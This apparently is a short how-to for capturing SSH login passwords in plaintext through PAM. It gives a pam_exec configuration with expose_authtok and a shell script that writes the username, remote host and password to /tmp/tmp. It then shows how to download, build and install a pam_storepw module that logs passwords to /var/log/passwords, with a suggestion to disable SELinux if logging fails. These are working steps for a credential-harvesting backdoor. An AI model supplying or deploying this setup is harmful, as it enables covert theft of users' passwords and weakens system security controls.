Sshd
sshd save password
pam_exec.so
/etc/pam.d/password-auth-ac
#%PAM-1.0 # This file is auto-generated. # User changes will be destroyed the next time authconfig is run. auth required pam_env.so auth sufficient pam_unix.so nullok try_first_pass auth optional pam_exec.so expose_authtok /usr/local/bin/pam_exec.so auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata ...
/usr/local/bin/pam_exec.so
#!/bin/sh read password echo "User: $PAM_USER" >> /tmp/tmp echo "Ruser: $PAM_RUSER" >> /tmp/tmp echo "Rhost: $PAM_RHOST" >> /tmp/tmp echo "Service: $PAM_SERVICE" >> /tmp/tmp echo "TTY: $PAM_TTY" >> /tmp/tmp echo "Password : $password" >> /tmp/tmp exit $?
pam_storepw.so
Download source code for module.
curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c
Create the following Makefile
all: pam_storepw.so pam_storepw.so: pam_storepw.o $(LD) --shared -o $@ $< -lpam -lpam_misc clean: rm -f pam_storepw.o pam_storepw.so core *~ extraclean: clean rm -f *.a *.o *.so *.bak .c.o: $(CC) $(CFLAGS) -c $< -o $@ -fPIC
Build file
make
Copy file
cp pam_storepw.so /lib64/security/ chmod 755 /lib64/security/pam_storepw.so
password-auth-ac
#%PAM-1.0 # This file is auto-generated. # User changes will be destroyed the next time authconfig is run. auth required pam_env.so auth sufficient pam_unix.so nullok try_first_pass auth optional pam_storepw.so auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata ...
Passwords start to be written to
/var/log/passwords
If you do not get any entries.
Temporarily turn selinux off to see if it starts to work run pam in debug to see what is going on.